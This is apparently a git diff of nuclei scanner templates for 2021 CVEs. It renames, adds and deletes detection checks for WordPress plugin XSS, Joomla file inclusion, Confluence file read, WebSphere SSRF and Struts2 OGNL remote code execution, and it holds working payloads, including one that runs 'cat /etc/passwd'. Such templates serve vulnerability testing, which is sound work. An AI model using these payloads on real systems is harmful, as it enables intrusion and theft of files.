mp on 2022/10/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24285.yaml b/nuclei-templates/CVE-2021/cve-2021-24285.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24285.yaml rename to nuclei-templates/CVE-2021/cve-2021-24285.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24300.yaml b/nuclei-templates/CVE-2021/cve-2021-24300.yaml new file mode 100644 index 0000000000..109f93ea66 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-24300.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-24300 + +info: + name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting + author: cckuailong + severity: medium + description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter. + reference: + - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24300 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="\"onmouseover=alert(document.domain);//">' + - "PickPlugins Product Slider" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-24316.yaml b/nuclei-templates/CVE-2021/cve-2021-24316.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24316.yaml rename to nuclei-templates/CVE-2021/cve-2021-24316.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24320.yaml b/nuclei-templates/CVE-2021/cve-2021-24320.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24320.yaml rename to nuclei-templates/CVE-2021/cve-2021-24320.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24358.yaml b/nuclei-templates/CVE-2021/cve-2021-24358.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24358.yaml rename to nuclei-templates/CVE-2021/cve-2021-24358.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24364.yaml b/nuclei-templates/CVE-2021/cve-2021-24364.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24364.yaml rename to nuclei-templates/CVE-2021/cve-2021-24364.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24370.yaml b/nuclei-templates/CVE-2021/cve-2021-24370.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24370.yaml rename to nuclei-templates/CVE-2021/cve-2021-24370.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24387.yaml b/nuclei-templates/CVE-2021/cve-2021-24387.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24387.yaml rename to nuclei-templates/CVE-2021/cve-2021-24387.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24389.yaml b/nuclei-templates/CVE-2021/cve-2021-24389.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24389.yaml rename to nuclei-templates/CVE-2021/cve-2021-24389.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24406.yaml b/nuclei-templates/CVE-2021/cve-2021-24406.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24406.yaml rename to nuclei-templates/CVE-2021/cve-2021-24406.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24495.yaml b/nuclei-templates/CVE-2021/cve-2021-24495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24495.yaml rename to nuclei-templates/CVE-2021/cve-2021-24495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24926.yaml b/nuclei-templates/CVE-2021/cve-2021-24926.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-24926.yaml rename to nuclei-templates/CVE-2021/cve-2021-24926.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24991.yaml b/nuclei-templates/CVE-2021/cve-2021-24991.yaml deleted file mode 100644 index 14c8b6e45f..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-24991.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-24991 - -info: - name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS - author: cckuailong - severity: medium - description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site - Scripting in the admin dashboard. - reference: - - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2021-24991 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" - - "WooCommerce PDF Invoices" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml b/nuclei-templates/CVE-2021/cve-2021-25055.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-25055.yaml rename to nuclei-templates/CVE-2021/cve-2021-25055.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-25085.yaml b/nuclei-templates/CVE-2021/cve-2021-25085.yaml deleted file mode 100644 index 250ce81d36..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-25085.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-25085 - -info: - name: WOOF WordPress plugin - Cross-Site Scripting - author: Maximus Decimus - severity: medium - description: | - The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting. - reference: - - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90 - - https://plugins.trac.wordpress.org/changeset/2648751 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25085 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25085 - metadata: - verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,xss,wpscan - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"additional_fields":[""]}' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2021/cve-2021-25118.yaml b/nuclei-templates/CVE-2021/cve-2021-25118.yaml new file mode 100644 index 0000000000..b82074a3bf --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25118.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-25118 + +info: + name: Yoast SEO < 17.3 - Path Disclosure + author: DhiyaneshDK + severity: medium + description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + reference: + - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 + - https://plugins.trac.wordpress.org/changeset/2608691 + remediation: Fixed in version 17.3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-25118 + cwe-id: CWE-200 + tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" + + matchers-condition: and + matchers: + - type: regex + regex: + - '"path":"(.*)/wp-content\\(.*)","size' + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"path":"(.*)/wp-content\\(.*)","size' diff --git a/nuclei-templates/CVE-2021/cve-2021-25120.yaml b/nuclei-templates/CVE-2021/cve-2021-25120.yaml new file mode 100644 index 0000000000..28aa3f7856 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-25120.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-25120 + +info: + name: Easy Social Feed < 6.2.7 - Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. + reference: + - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 + - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25120 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-25120 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'type' : ''" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25864.yaml b/nuclei-templates/CVE-2021/cve-2021-25864.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-25864.yaml rename to nuclei-templates/CVE-2021/cve-2021-25864.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-26085.yaml b/nuclei-templates/CVE-2021/cve-2021-26085.yaml deleted file mode 100644 index 8d7382901f..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-26085.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-26085 -info: - name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 - author: princechaddha - severity: medium - description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. - reference: - - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2021-26085 - cwe-id: CWE-862 - -requests: - - method: GET - path: - - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "Confluence" - - "com.atlassian.confluence.setup.ConfluenceAppConfig" - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-26598.yaml b/nuclei-templates/CVE-2021/cve-2021-26598.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-26598.yaml rename to nuclei-templates/CVE-2021/cve-2021-26598.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-26702.yaml b/nuclei-templates/CVE-2021/cve-2021-26702.yaml new file mode 100644 index 0000000000..a543bb5aa1 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-26702.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-26702 + +info: + name: EPrints 3.4.2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI. + reference: + - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + - https://files.eprints.org/2548/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-26702 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26702 + cwe-id: CWE-79 + tags: cve,cve2021,xss,eprints + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-27519.yaml b/nuclei-templates/CVE-2021/cve-2021-27519.yaml new file mode 100644 index 0000000000..93e44aea56 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-27519.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-27519 + +info: + name: FUDForum 3.1.0 - Cross-Site Scripting + author: kh4sh3i + severity: medium + description: | + FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. + reference: + - https://www.exploit-db.com/exploits/49942 + - https://github.com/fudforum/FUDforum/issues/2 + - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-27519 + cwe-id: CWE-79 + metadata: + shodan-query: 'http.html:"Powered by: FUDforum"' + verified: "true" + tags: xss,fudforum,edb,packetstorm,cve,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27651.yaml b/nuclei-templates/CVE-2021/cve-2021-27651.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-27651.yaml rename to nuclei-templates/CVE-2021/cve-2021-27651.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-27748.yaml b/nuclei-templates/CVE-2021/cve-2021-27748.yaml deleted file mode 100644 index 50186d4e60..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-27748.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-27748 - -info: - name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery - author: pdteam - severity: high - description: | - IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. - reference: - - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - - hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268 - classification: - cve-id: CVE-2021-27748 - metadata: - verified: true - shodan-query: http.html:"IBM WebSphere Portal" - tags: cve,cve2021,hcl,ibm,ssrf,websphere - -requests: - - method: GET - path: - - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' - - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - words: - - "Interactsh Server" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28150.yaml b/nuclei-templates/CVE-2021/cve-2021-28150.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28150.yaml rename to nuclei-templates/CVE-2021/cve-2021-28150.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-28151.yaml b/nuclei-templates/CVE-2021/cve-2021-28151.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28151.yaml rename to nuclei-templates/CVE-2021/cve-2021-28151.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-28377.yaml b/nuclei-templates/CVE-2021/cve-2021-28377.yaml new file mode 100644 index 0000000000..03cc1bbced --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-28377.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-28377 + +info: + name: Joomla! ChronoForums 2.0.11 - Local File Inclusion + author: 0x_Akoko + severity: medium + description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials. + reference: + - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-28377 + cwe-id: CWE-22 + tags: cve,cve2021,chronoforums,lfi,joomla + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28854.yaml b/nuclei-templates/CVE-2021/cve-2021-28854.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28854.yaml rename to nuclei-templates/CVE-2021/cve-2021-28854.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-28937.yaml b/nuclei-templates/CVE-2021/cve-2021-28937.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-28937.yaml rename to nuclei-templates/CVE-2021/cve-2021-28937.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-29203.yaml b/nuclei-templates/CVE-2021/cve-2021-29203.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-29203.yaml rename to nuclei-templates/CVE-2021/cve-2021-29203.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-29490.yaml b/nuclei-templates/CVE-2021/cve-2021-29490.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-29490.yaml rename to nuclei-templates/CVE-2021/cve-2021-29490.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-30049.yaml b/nuclei-templates/CVE-2021/cve-2021-30049.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-30049.yaml rename to nuclei-templates/CVE-2021/cve-2021-30049.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3017.yaml b/nuclei-templates/CVE-2021/cve-2021-3017.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3017.yaml rename to nuclei-templates/CVE-2021/cve-2021-3017.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31589.yaml b/nuclei-templates/CVE-2021/cve-2021-31589.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-31589.yaml rename to nuclei-templates/CVE-2021/cve-2021-31589.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31755.yaml b/nuclei-templates/CVE-2021/cve-2021-31755.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-31755.yaml rename to nuclei-templates/CVE-2021/cve-2021-31755.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-31805.yaml b/nuclei-templates/CVE-2021/cve-2021-31805.yaml deleted file mode 100644 index 2394432a9e..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-31805.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2021-31805 - -info: - name: Apache Struts2 S2-062 - Remote Code Execution - author: taielab - severity: critical - description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-062 - - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-31805 - cwe-id: CWE-917 - tags: cve,cve2021,apache,rce,struts,struts2 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Length: 1095 - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Disposition: form-data; name="id" - - %{ - (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + - (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + - (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) - } - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-32030.yaml b/nuclei-templates/CVE-2021/cve-2021-32030.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32030.yaml rename to nuclei-templates/CVE-2021/cve-2021-32030.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32172.yaml b/nuclei-templates/CVE-2021/cve-2021-32172.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32172.yaml rename to nuclei-templates/CVE-2021/cve-2021-32172.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32618.yaml b/nuclei-templates/CVE-2021/cve-2021-32618.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32618.yaml rename to nuclei-templates/CVE-2021/cve-2021-32618.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3297.yaml b/nuclei-templates/CVE-2021/cve-2021-3297.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3297.yaml rename to nuclei-templates/CVE-2021/cve-2021-3297.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33357.yaml b/nuclei-templates/CVE-2021/cve-2021-33357.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-33357.yaml rename to nuclei-templates/CVE-2021/cve-2021-33357.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33564.yaml b/nuclei-templates/CVE-2021/cve-2021-33564.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-33564.yaml rename to nuclei-templates/CVE-2021/cve-2021-33564.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3377.yaml b/nuclei-templates/CVE-2021/cve-2021-3377.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3377.yaml rename to nuclei-templates/CVE-2021/cve-2021-3377.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-34640.yaml b/nuclei-templates/CVE-2021/cve-2021-34640.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-34640.yaml rename to nuclei-templates/CVE-2021/cve-2021-34640.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml b/nuclei-templates/CVE-2021/cve-2021-34643.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-34643.yaml rename to nuclei-templates/CVE-2021/cve-2021-34643.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-34805.yaml b/nuclei-templates/CVE-2021/cve-2021-34805.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-34805.yaml rename to nuclei-templates/CVE-2021/cve-2021-34805.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3577.yaml b/nuclei-templates/CVE-2021/cve-2021-3577.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3577.yaml rename to nuclei-templates/CVE-2021/cve-2021-3577.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-36450.yaml b/nuclei-templates/CVE-2021/cve-2021-36450.yaml new file mode 100644 index 0000000000..5b869877e6 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-36450.yaml @@ -0,0 +1,65 @@ +id: CVE-2021-36450 + +info: + name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting + author: atomiczsec + severity: medium + description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter. + reference: + - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 + - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + - http://verint.com + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-36450 + cwe-id: CWE-79 + metadata: + shodan-query: title:"Verint Sign-in" + verified: "true" + tags: cve,cve2021,xss,verint + +requests: + - raw: + - | + GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} + + host-redirects: true + max-redirects: 2 + cookie-reuse: true + + extractors: + - type: regex + part: header + internal: true + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">

Test

26" class="loginUserNameText' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-36749.yaml b/nuclei-templates/CVE-2021/cve-2021-36749.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-36749.yaml rename to nuclei-templates/CVE-2021/cve-2021-36749.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-37216.yaml b/nuclei-templates/CVE-2021/cve-2021-37216.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-37216.yaml rename to nuclei-templates/CVE-2021/cve-2021-37216.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-37580.yaml b/nuclei-templates/CVE-2021/cve-2021-37580.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-37580.yaml rename to nuclei-templates/CVE-2021/cve-2021-37580.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-38647.yaml b/nuclei-templates/CVE-2021/cve-2021-38647.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-38647.yaml rename to nuclei-templates/CVE-2021/cve-2021-38647.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml b/nuclei-templates/CVE-2021/cve-2021-38702.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-38702.yaml rename to nuclei-templates/CVE-2021/cve-2021-38702.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-39211.yaml b/nuclei-templates/CVE-2021/cve-2021-39211.yaml deleted file mode 100644 index 3cfca7f214..0000000000 --- 